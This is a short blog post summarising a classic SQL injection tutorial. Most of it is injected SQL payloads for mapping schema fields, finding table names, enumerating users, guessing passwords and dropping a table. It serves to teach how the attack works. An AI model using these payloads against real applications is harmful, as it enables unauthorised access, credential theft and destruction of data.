This is pretty old but pretty cool!
The original article for this could be found on
http://unixwiz.net/techtips/sql-injection.html
Schema field mapping
SELECT fieldlist
FROM table
WHERE field = 'x' AND email IS NULL; --';
SELECT fieldlist
FROM table
WHERE email = 'x' AND userid IS NULL; --';
result can get several valid field names:
email, passwd, login_id, full_name
Finding the table name
SELECT email, passwd, login_id, full_name
FROM table
WHERE email = 'x' AND 1=(SELECT COUNT(*) FROM tabname); --';
SELECT email, passwd, login_id, full_name
FROM members
WHERE email = 'x' AND members.email IS NULL; --';
Finding some users
SELECT email, passwd, login_id, full_name
FROM members
WHERE email = 'x' OR full_name LIKE '%Bob%';
Brute-force password guessing
SELECT email, passwd, login_id, full_name
FROM members
WHERE email = 'bob@example.com' AND passwd = 'hello123';
The database isn't readonly
SELECT email, passwd, login_id, full_name
FROM members
WHERE email = 'x'; DROP TABLE members; --'; -- Boom!
No comments:
Post a Comment